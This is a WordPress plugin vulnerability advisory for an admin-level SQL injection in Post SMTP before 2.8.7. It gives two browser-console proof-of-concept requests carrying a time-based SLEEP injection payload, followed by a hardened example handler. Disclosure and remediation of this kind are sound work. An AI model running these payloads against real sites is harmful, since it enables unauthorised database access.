WordPress Plugin Vulnerabilities
Post SMTP < 2.8.7 - Admin+ SQL Injection
Description
The plugin does not properly sanitise and escape several parameters before using them in SQL statements, leading to a SQL injection exploitable by high-privilege users such as Admin.
Proof of Concept
# In `ps-delete-email-logs` action:

Visit the Post SMTP > Email Log page and run the following code in the browser console:

    nonce = document.getElementById('ps-email-log-nonce').value
    await fetch("/wp-admin/admin-ajax.php", {
      "credentials": "include",
      "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
        "Sec-Fetch-Site": "same-origin"
      },
      "body": "action=ps-delete-email-logs&security=" + nonce + "&selected%5B%5D=1)%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))a)#",
      "method": "POST",
      "mode": "cors"
    });

# In `ps-export-email-logs` action:

Visit the Post SMTP > Email Log page and run the following code in the browser console:

    nonce = document.getElementById('ps-email-log-nonce').value
    await fetch("/wp-admin/admin-ajax.php", {
      "credentials": "include",
      "headers": {
        "Content-Type": "application/x-www-form-urlencoded",
        "Sec-Fetch-Site": "same-origin"
      },
      "body": "action=ps-export-email-logs&security=" + nonce + "&selected%5B%5D=1)%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))a)#",
      "method": "POST",
      "mode": "cors"
    });
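The root cause described above is a `selected[]` array of log IDs reaching a SQL statement without type enforcement or escaping. The handler below is an added example of the hardened shape such an AJAX action should take; it is not Post SMTP's own code, and the action name `ps-example-delete-logs`, the function `ps_example_delete_logs`, the nonce action `ps-email-log` and the table suffix `ps_email_log` are assumptions made for illustration.

```php
<?php
// Added example (not the plugin's code): a hardened "delete selected log rows"
// AJAX handler. The weak pattern it replaces builds the IN list directly from
// user input, e.g. "... WHERE id IN (" . implode( ',', $_POST['selected'] ) . ")",
// which is what lets a value like "1) AND (SELECT ...)" change the query.

add_action( 'wp_ajax_ps-example-delete-logs', 'ps_example_delete_logs' );

function ps_example_delete_logs() {
    global $wpdb;

    // 1. Nonce and capability checks: the action stays limited to administrators.
    check_ajax_referer( 'ps-email-log', 'security' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 2. Type enforcement: every selected[] entry is coerced to a non-negative
    //    integer with absint() and zeros are dropped. "1) AND (SELECT ...)" becomes 1,
    //    so no SQL fragment can survive into the statement.
    $raw = isset( $_POST['selected'] ) ? (array) wp_unslash( $_POST['selected'] ) : array();
    $ids = array_values( array_filter( array_map( 'absint', $raw ) ) );
    if ( empty( $ids ) ) {
        wp_send_json_error( 'no valid ids', 400 );
    }

    // 3. Parameterised query: one %d placeholder per id, bound by $wpdb->prepare().
    //    The table name comes from the configured prefix, not from the request.
    $table        = $wpdb->prefix . 'ps_email_log'; // assumed table name
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    $sql          = $wpdb->prepare(
        "DELETE FROM {$table} WHERE id IN ({$placeholders})",
        $ids
    );
    $deleted = $wpdb->query( $sql );

    wp_send_json_success( array( 'deleted' => (int) $deleted ) );
}
```

The same three steps (nonce and capability check, integer coercion of the ID list, placeholder-bound query) apply to the export action, which only differs in the SELECT it runs over the validated IDs. Note that the capability check alone would not have prevented this issue, since the reported vector is an authenticated admin; the type enforcement and `$wpdb->prepare()` binding are what remove the injection.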
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Alex Sanford
Submitter
Alex Sanford
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-12-21
Added
2023-12-21
Last Updated
2023-12-21